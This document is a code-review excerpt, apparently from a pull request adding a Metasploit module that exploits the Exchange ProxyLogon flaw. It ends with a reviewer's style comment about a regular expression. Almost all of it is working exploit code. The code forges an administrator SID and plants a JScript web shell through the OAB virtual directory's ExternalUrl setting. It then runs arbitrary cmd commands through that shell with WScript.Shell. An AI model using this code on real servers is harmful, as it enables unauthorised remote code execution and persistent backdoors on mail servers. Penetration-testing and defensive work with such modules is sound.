modules/exploits/windows/http/exchange_proxylogon_rce.rb

```diff
@@ -0,0 +1,532 @@
+      OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\auth']),
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),
+      OptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]),
+      OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0'])
+    ])
+  end
+
+  def cmd_windows_generic?
+    datastore['PAYLOAD'] == 'cmd/windows/generic'
+  end
+
+  def execute_command(cmd, _opts = {})
+    web_dir = datastore['ExchangeWritePath'].gsub('\\', '/')
+    cmd = "Response.Write(new ActiveXObject(\"WScript.Shell\").Exec(\"cmd /c #{cmd}\").StdOut.ReadAll());"
+    send_request_raw(
+      'method' => 'POST',
+      'uri' => normalize_uri(web_dir, @random_filename),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'data' => "#{@random_inputname}=#{cmd}"
+    )
+  end
+
+  def install_payload(exploit_info)
+    # exploit_info: [server_name, sid, session, canary, oab_id]
+
+    input_name = rand_text_alpha(4..8).to_s
+    shell = "http://o/#<script language=\"JScript\" runat=\"server\">function Page_Load(){eval(Request[\"#{input_name}\"],\"unsafe\");}</script>"
+    data = {
+      'identity': {
+        '__type': 'Identity:ECP',
+        'DisplayName': (exploit_info[4][0]).to_s,
+        'RawIdentity': (exploit_info[4][1]).to_s
+      },
+      'properties': {
+        'Parameters': {
+          '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
+          'ExternalUrl': shell.to_s
+        }
+      }
+    }.to_json
+
+    response = send_http(
+      'POST',
+      "Admin@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~1942062522",
+      data: data,
+      cookie: exploit_info[2],
+      ctype: 'application/json; charset=utf-8',
+      headers: {
+        'msExchLogonMailbox' => patch_sid(exploit_info[1]),
+        'msExchTargetMailbox' => patch_sid(exploit_info[1]),
+        'X-vDirObjectId' => (exploit_info[4][1]).to_s
+      }
+    )
+    return '' if response.code != 200
+
+    input_name
+  end
+
+  def message(msg)
+    "#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}"
+  end
+
+  def patch_sid(sid)
+    ar = sid.to_s.split('-')
+    if ar[-1] != '500'
+      sid = "#{ar[0..6].join('-')}-500"
+    end
+
+    sid
+  end
+
+  def request_autodiscover(server_name)
+    xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }
+
+    response = send_http(
+      'POST',
+      "#{server_name}/autodiscover/autodiscover.xml?a=~1942062522",
+      data: soap_autodiscover,
+      ctype: 'text/xml; charset=utf-8'
+    )
+
+    case response.body
+    when /<ErrorCode>500<\/ErrorCode>/
```

Comment:
Rubocop complains about this: `Use %r around regular expression`. Please, can you address it?